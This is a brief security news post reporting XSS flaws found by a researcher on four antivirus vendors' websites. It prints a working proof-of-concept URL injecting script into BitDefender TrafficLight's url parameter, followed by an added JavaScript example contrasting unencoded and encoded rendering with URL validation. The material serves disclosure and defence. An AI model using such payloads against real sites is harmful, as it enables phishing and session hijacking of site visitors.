
XSS Vulnerability found in 4 Antivirus websites



Security researcher Ankit Sharma has discovered cross-site scripting (XSS) vulnerabilities in four antivirus websites.

The official websites of BitDefender, AVG, Avira and Total Defense Antivirus are vulnerable to XSS.



In BitDefender TrafficLight, the URL input is not filtered for XSS. The URL input allows hackers to run malicious XSS code, which can result in phishing attacks.

POC:
http://trafficlight.bitdefender.com/info?url=%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%27;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//\%22;alert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83,32,32,66,89,32,32,65,78,75,73,84%20%29%29%3C/SCRIPT%3E
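The filtering gap described above, shown as an added example that is not from the original post or from BitDefender's code: the same value is rendered once without encoding and once with context-aware output encoding plus URL validation. The post does not say where in the page the `url` value is reflected, so the HTML attribute and inline-script contexts, the function names and the sample string (constructed, shaped like the PoC's decoded parameter) are assumptions.

```javascript
// Constructed sample shaped like the PoC's decoded `url` value
// (alert(1) stands in for the String.fromCharCode call).
const SAMPLE =
  `';alert(1)//\\';alert(1)//";alert(1)//\\";alert(1)//--></SCRIPT>">'><SCRIPT>alert(1)</SCRIPT>`;

// Encoder for HTML text and quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Encoder for a JS string literal inside an inline <script> block.
// JSON.stringify handles quotes and backslashes; <, > and & are also
// escaped so "</script>" or "<!--" in the value cannot end the block.
function jsString(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Input validation: a URL checker only needs absolute http(s) URLs.
function parseHttpUrl(raw) {
  try {
    const u = new URL(raw);
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
  } catch {
    return null; // not a parseable absolute URL
  }
}

// Hypothetical page template, value reflected with no encoding (the flaw).
function renderUnsafe(raw) {
  return `<input name="url" value="${raw}"><script>var checked = '${raw}';</script>`;
}

// Same template with each sink encoded for its own context.
function renderSafe(raw) {
  return `<input name="url" value="${escapeHtml(raw)}">` +
         `<script>var checked = ${jsString(raw)};</script>`;
}

console.log(renderUnsafe(SAMPLE));
console.log(renderSafe(SAMPLE));
console.log(parseHttpUrl(SAMPLE), parseHttpUrl('http://example.com/a'));
```

Validation rejects the sample before it reaches the template, and encoding keeps the page intact for any value that validation lets through.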


